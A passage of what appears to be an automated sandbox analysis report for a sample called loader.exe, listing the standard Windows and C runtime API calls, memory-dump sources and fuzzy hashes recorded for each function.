                                                                                      • Associated: 00000000.00000002.1664438866.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664455230.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664470846.000000000026F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664488606.0000000000271000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_240000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                      • String ID: ^%$csm
                                                                                      • API String ID: 1170836740-290365969
                                                                                      • Opcode ID: b0731c60ca1c0131d980e5b10a839ad3a7a0538c614b68cd61d81fac2a4be2c1
                                                                                      • Instruction ID: 24461272d99464931334caab02376a4401266f9b80ac7fd8ec72d22bc90ff461
                                                                                      • Opcode Fuzzy Hash: b0731c60ca1c0131d980e5b10a839ad3a7a0538c614b68cd61d81fac2a4be2c1
                                                                                      • Instruction Fuzzy Hash: EF41F534A20209DBCF10DF68C848AAEBBB4BF05315F548155EC199B392D731AA69CF94
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1664399582.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1664383612.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664421732.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664438866.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664455230.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664470846.000000000026F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664488606.0000000000271000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_240000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: __freea$__alloca_probe_16$Info
                                                                                      • String ID:
                                                                                      • API String ID: 127012223-0
                                                                                      • Opcode ID: 364f4a34ed9e511c891f5f394ee4b0f5a76e9843e50ddd4bd6c4503566f8c451
                                                                                      • Instruction ID: 570a89f0fac3fad8692a0d265cfd3f25d5ea449f2917dd0c3737beed2bb3431a
                                                                                      • Opcode Fuzzy Hash: 364f4a34ed9e511c891f5f394ee4b0f5a76e9843e50ddd4bd6c4503566f8c451
                                                                                      • Instruction Fuzzy Hash: 507125729202469FDF219F548CC2BAF77B9AF48311F580056ED05A7281EB70DCB4AF94
                                                                                      APIs
                                                                                      • GetLastError.KERNEL32(?,?,00258831,00255F0D,002555A4), ref: 00258848
                                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00258856
                                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0025886F
                                                                                      • SetLastError.KERNEL32(00000000,00258831,00255F0D,002555A4), ref: 002588C1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1664399582.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1664383612.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664421732.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664438866.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664455230.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664470846.000000000026F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664488606.0000000000271000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_240000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLastValue___vcrt_
                                                                                      • String ID:
                                                                                      • API String ID: 3852720340-0
                                                                                      • Opcode ID: 2593890700d597591740e533f09be898574a71b734d1f1036838d806973edebb
                                                                                      • Instruction ID: 181e92d1616f54782504849737fecf22ccf3a76c04bcaeb1fecf194a5d6a54fe
                                                                                      • Opcode Fuzzy Hash: 2593890700d597591740e533f09be898574a71b734d1f1036838d806973edebb
                                                                                      • Instruction Fuzzy Hash: C501D83213D21A9DE6252F74BC8EA1A2759EB117B73600329FD11A51F0EFF18C69968C
                                                                                      Strings
                                                                                      • C:\Users\user\Desktop\loader.exe, xrefs: 0025CB70
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1664399582.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1664383612.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664421732.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664438866.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664455230.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664470846.000000000026F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664488606.0000000000271000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_240000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: C:\Users\user\Desktop\loader.exe
                                                                                      • API String ID: 0-2389675944
                                                                                      • Opcode ID: b3f1fd042360b0f679e36aad4169269155dc551d7fbf8c2a3eb3ffc6e75bcdfd
                                                                                      • Instruction ID: 02fb4af0ab13f4c14d732131bf8682099d04beccf8d083d05f7cc7e2d830f937
                                                                                      • Opcode Fuzzy Hash: b3f1fd042360b0f679e36aad4169269155dc551d7fbf8c2a3eb3ffc6e75bcdfd
                                                                                      • Instruction Fuzzy Hash: 2F21F671220306AFCB20AF65DC82D2AB7ACEF543AB7204515FC1997251FB30EC68DB94
                                                                                      APIs
                                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,CB8E8CE7,?,?,00000000,002625EB,000000FF,?,00257015,00000002,?,002570B1,002583A0), ref: 00256F89
                                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00256F9B
                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,00000000,002625EB,000000FF,?,00257015,00000002,?,002570B1,002583A0), ref: 00256FBD
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1664399582.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1664383612.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664421732.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664438866.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664455230.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664470846.000000000026F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664488606.0000000000271000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_240000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                      • API String ID: 4061214504-1276376045
                                                                                      • Opcode ID: 9c0c6d4be1d0398295538fe0d2d61482bb7519b1a032e974c7316f14963a5065
                                                                                      • Instruction ID: 91b171cee3b07e10b9935d4ee13932f23c0f48d0af41b7f5d248a2b8d1c7ecac
                                                                                      • Opcode Fuzzy Hash: 9c0c6d4be1d0398295538fe0d2d61482bb7519b1a032e974c7316f14963a5065
                                                                                      • Instruction Fuzzy Hash: 9301623192865AABDB118F50EC0DFAEB7BCFB04B15F044625E812E26A0DFB49954CA94
                                                                                      APIs
                                                                                      • __alloca_probe_16.LIBCMT ref: 0025DFA2
                                                                                      • __alloca_probe_16.LIBCMT ref: 0025E06B
                                                                                      • __freea.LIBCMT ref: 0025E0D2
                                                                                        • Part of subcall function 0025BC45: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,002541E0,?,?,00251007,?,0024FAB5), ref: 0025BC77
                                                                                      • __freea.LIBCMT ref: 0025E0E5
                                                                                      • __freea.LIBCMT ref: 0025E0F2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1664399582.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1664383612.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664421732.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664438866.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664455230.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664470846.000000000026F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664488606.0000000000271000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_240000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                                      • String ID:
                                                                                      • API String ID: 1423051803-0
                                                                                      • Opcode ID: 15c8b9644fdfe7d635177907b2897cc7174fe0c02d6908982e0ee7225c0d601c
                                                                                      • Instruction ID: 986c8dcbf2568fad0f59aecb4cb9ad66d08cd5a8273defd585f14ebdc47a5a31
                                                                                      • Opcode Fuzzy Hash: 15c8b9644fdfe7d635177907b2897cc7174fe0c02d6908982e0ee7225c0d601c
                                                                                      • Instruction Fuzzy Hash: C751D771530216AFDF256F60CC41DBB77A9EF44712B164029FD04E6181EBB1CD78CA68
                                                                                      APIs
                                                                                      • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,002593FE,?,?,00000000,00000000,00000000,?), ref: 0025951D
                                                                                      • CatchIt.LIBVCRUNTIME ref: 00259603
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1664399582.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1664383612.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664421732.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664438866.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664455230.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664470846.000000000026F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664488606.0000000000271000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_240000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: CatchEncodePointer
                                                                                      • String ID: MOC$RCC
                                                                                      • API String ID: 1435073870-2084237596
                                                                                      • Opcode ID: 5859f55e3e137c3566cea9f0db498e3f3498515534107c0b74ca2f195d8d051d
                                                                                      • Instruction ID: 683026ba307b18abd27b981e5e0ef7756125d05c754a92dc2fc57928c4da2855
                                                                                      • Opcode Fuzzy Hash: 5859f55e3e137c3566cea9f0db498e3f3498515534107c0b74ca2f195d8d051d
                                                                                      • Instruction Fuzzy Hash: 3841677190020AEFCF16CF94C881AAE7BB9EF48301F188099F905A7211E735D9A8CB58
                                                                                      APIs
                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,0025DCFA,00000000,?,0026CCD0,?,?,?,0025DC31,00000004,InitializeCriticalSectionEx,002646F8,00264700), ref: 0025DC6B
                                                                                      • GetLastError.KERNEL32(?,0025DCFA,00000000,?,0026CCD0,?,?,?,0025DC31,00000004,InitializeCriticalSectionEx,002646F8,00264700,00000000,?,0025971C), ref: 0025DC75
                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 0025DC9D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1664399582.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1664383612.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664421732.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664438866.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664455230.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664470846.000000000026F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664488606.0000000000271000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_240000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad$ErrorLast
                                                                                      • String ID: api-ms-
                                                                                      • API String ID: 3177248105-2084034818
                                                                                      • Opcode ID: 6b49698fbfe501670bc3fd2beb2388d51710b45179d7bcb305f8766780ed7829
                                                                                      • Instruction ID: ec46a85c5822dff356d531a0e93fb94fef6302bc80af3d360fac48d54d125535
                                                                                      • Opcode Fuzzy Hash: 6b49698fbfe501670bc3fd2beb2388d51710b45179d7bcb305f8766780ed7829
                                                                                      • Instruction Fuzzy Hash: FDE04830250205BFEF202F61ED0AB583B59AB01B57F108021FD0DE80E1EFF2A865D548
                                                                                      APIs
                                                                                      • GetConsoleOutputCP.KERNEL32(CB8E8CE7,00000000,00000000,?), ref: 0025E64B
                                                                                        • Part of subcall function 0025D131: WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,00000000,00000000,000000FF,?,?,00000000,?,?,002587B1,?,00000000,?), ref: 0025D192
                                                                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0025E89D
                                                                                      • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0025E8E3
                                                                                      • GetLastError.KERNEL32 ref: 0025E986
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1664399582.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1664383612.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664421732.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664438866.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664455230.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664470846.000000000026F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664488606.0000000000271000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_240000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                      • String ID:
                                                                                      • API String ID: 2112829910-0
                                                                                      • Opcode ID: 70d23200c113217b2b2a4dc9abc272d61bb2de4779c6cbe9dadd868aaf9791d5
                                                                                      • Instruction ID: 22ebe513b7329a7d2eb4a9a7cbbffd70cf4473396eb0d7c5488e47ca29418c59
                                                                                      • Opcode Fuzzy Hash: 70d23200c113217b2b2a4dc9abc272d61bb2de4779c6cbe9dadd868aaf9791d5
                                                                                      • Instruction Fuzzy Hash: 58D1BB71D102489FCF19CFA8C8849ADFBB8FF09311F29412AE865EB251D630AA56CF54
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1664399582.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1664383612.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664421732.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664438866.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664455230.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664470846.000000000026F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664488606.0000000000271000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_240000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: AdjustPointer
                                                                                      • String ID:
                                                                                      • API String ID: 1740715915-0
                                                                                      • Opcode ID: 6547b46a2685e850256467cbae39b5bb00a4c92ac82b73050451aa78019471d1
                                                                                      • Instruction ID: 03c141280c4a8897a15ff7e7f8d3c6626093b268292bc30286acf0d814370ea5
                                                                                      • Opcode Fuzzy Hash: 6547b46a2685e850256467cbae39b5bb00a4c92ac82b73050451aa78019471d1
                                                                                      • Instruction Fuzzy Hash: D451D171635202EFEB298F14D841B7A73A5EF04302F14082DED45975D1EBB1ECA8CB98
                                                                                      APIs
                                                                                        • Part of subcall function 0025D131: WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,00000000,00000000,000000FF,?,?,00000000,?,?,002587B1,?,00000000,?), ref: 0025D192
                                                                                      • GetLastError.KERNEL32 ref: 0025C61C
                                                                                      • __dosmaperr.LIBCMT ref: 0025C623
                                                                                      • GetLastError.KERNEL32(?,?,?,?), ref: 0025C65D
                                                                                      • __dosmaperr.LIBCMT ref: 0025C664
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1664399582.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1664383612.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664421732.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664438866.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664455230.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664470846.000000000026F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664488606.0000000000271000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_240000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                      • String ID:
                                                                                      • API String ID: 1913693674-0
                                                                                      • Opcode ID: f89b51d601ae3dc5803fe4e00eee38ab0613ccd6a579360772b347aeab9d000e
                                                                                      • Instruction ID: 21ed4d63c8830745ffef1300c01e5526130a3d39cc12b2f0764a152e64f297de
                                                                                      • Opcode Fuzzy Hash: f89b51d601ae3dc5803fe4e00eee38ab0613ccd6a579360772b347aeab9d000e
                                                                                      • Instruction Fuzzy Hash: BD21B671220306AF9B119F65888192AB7ACEF853667608428FC15D7551FB70ED64CF98
                                                                                      APIs
                                                                                      • GetEnvironmentStringsW.KERNEL32 ref: 0025D235
                                                                                        • Part of subcall function 0025D131: WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,00000000,00000000,000000FF,?,?,00000000,?,?,002587B1,?,00000000,?), ref: 0025D192
                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0025D26D
                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0025D28D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1664399582.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1664383612.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664421732.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664438866.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664455230.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664470846.000000000026F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664488606.0000000000271000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_240000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                      • String ID:
                                                                                      • API String ID: 158306478-0
                                                                                      • Opcode ID: a3d4e3f901dcc857371a4aa0b31dc9771c0240f0d46038d82d2774c75938e535
                                                                                      • Instruction ID: b99cb1e09e5c7e99c8c780d1d7eea01b070f155d0b8c2adcc3d0bf598ea1d63a
                                                                                      • Opcode Fuzzy Hash: a3d4e3f901dcc857371a4aa0b31dc9771c0240f0d46038d82d2774c75938e535
                                                                                      • Instruction Fuzzy Hash: D01161B15215197E6B312B716C89CAF696CDE95397B104424FC01D2142FFB0CD6A4979
                                                                                      APIs
                                                                                      • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,0025FF31,00000000,00000001,00000000,?,?,0025E9DA,?,00000000,00000000), ref: 002607D7
                                                                                      • GetLastError.KERNEL32(?,0025FF31,00000000,00000001,00000000,?,?,0025E9DA,?,00000000,00000000,?,?,?,0025E320,00000000), ref: 002607E3
                                                                                        • Part of subcall function 00260840: CloseHandle.KERNEL32(FFFFFFFE,002607F3,?,0025FF31,00000000,00000001,00000000,?,?,0025E9DA,?,00000000,00000000,?,?), ref: 00260850
                                                                                      • ___initconout.LIBCMT ref: 002607F3
                                                                                        • Part of subcall function 00260815: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,002607B1,0025FF1E,?,?,0025E9DA,?,00000000,00000000,?), ref: 00260828
                                                                                      • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,0025FF31,00000000,00000001,00000000,?,?,0025E9DA,?,00000000,00000000,?), ref: 00260808
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1664399582.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1664383612.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664421732.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664438866.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664455230.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664470846.000000000026F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664488606.0000000000271000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_240000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                      • String ID:
                                                                                      • API String ID: 2744216297-0
                                                                                      • Opcode ID: 6f7f305ef27482cea997056cac3d49f91f02d3cfdf804e389ccc4d98d7d1299a
                                                                                      • Instruction ID: 24a98747bf9a8eebc277b662fcf28eeb9497838dc9e7a53946f5c3fc13af0477
                                                                                      • Opcode Fuzzy Hash: 6f7f305ef27482cea997056cac3d49f91f02d3cfdf804e389ccc4d98d7d1299a
                                                                                      • Instruction Fuzzy Hash: E7F01C36010119BBCF225F91EC0898B3F2AFF087A1F00C461FA0886121CAB28CB0AFD0
                                                                                      APIs
                                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 00258D75
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1664399582.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1664383612.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664421732.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664438866.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664455230.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664470846.000000000026F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664488606.0000000000271000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_240000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: ___except_validate_context_record
                                                                                      • String ID: csm$csm
                                                                                      • API String ID: 3493665558-3733052814
                                                                                      • Opcode ID: bbd809115c2aca3d0a3fe9ae4ed24aa0adb14bd821432e3b8416d2a0c5fa3de4
                                                                                      • Instruction ID: 2f7d1f28a3efbabd783d98e9e7196753a872ab44b6f65e751935a643a00bd155
                                                                                      • Opcode Fuzzy Hash: bbd809115c2aca3d0a3fe9ae4ed24aa0adb14bd821432e3b8416d2a0c5fa3de4
                                                                                      • Instruction Fuzzy Hash: C131F276520216EFCF224F50D8069AA7B76FF09316B08455AFC0429121CBB2DCB5DB89
                                                                                      APIs
                                                                                        • Part of subcall function 00254533: __EH_prolog3_GS.LIBCMT ref: 0025453A
                                                                                      • std::domain_error::domain_error.LIBCPMT ref: 002545EC
                                                                                        • Part of subcall function 002543A4: std::exception::exception.LIBCONCRT ref: 002543BA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1664399582.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1664383612.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664421732.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664438866.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664455230.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664470846.000000000026F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664488606.0000000000271000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_240000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: H_prolog3_std::domain_error::domain_errorstd::exception::exception
                                                                                      • String ID: CD%$CD%
                                                                                      • API String ID: 2144476180-4139937635
                                                                                      • Opcode ID: 56cd20673f03fb927f01b695538eac8c07db6c489a9b61a19f625f01c1d66871
                                                                                      • Instruction ID: 6751bf555e1f6d2364732107d4362f27901196a9cd8b990498a0e862403f046d
                                                                                      • Opcode Fuzzy Hash: 56cd20673f03fb927f01b695538eac8c07db6c489a9b61a19f625f01c1d66871
                                                                                      • Instruction Fuzzy Hash: C6015E70E10218ABCF18EF69D8458AEBBF8FF48708B50841EE81597340DB74DA55CF94
                                                                                      APIs
                                                                                      • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0025C8CB
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1663753098.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1663738040.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1663775086.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1663790403.000000000026B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1663803959.000000000026F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1663820452.0000000000271000.00000008.00000001.01000000.00000003.sdmpDownload File
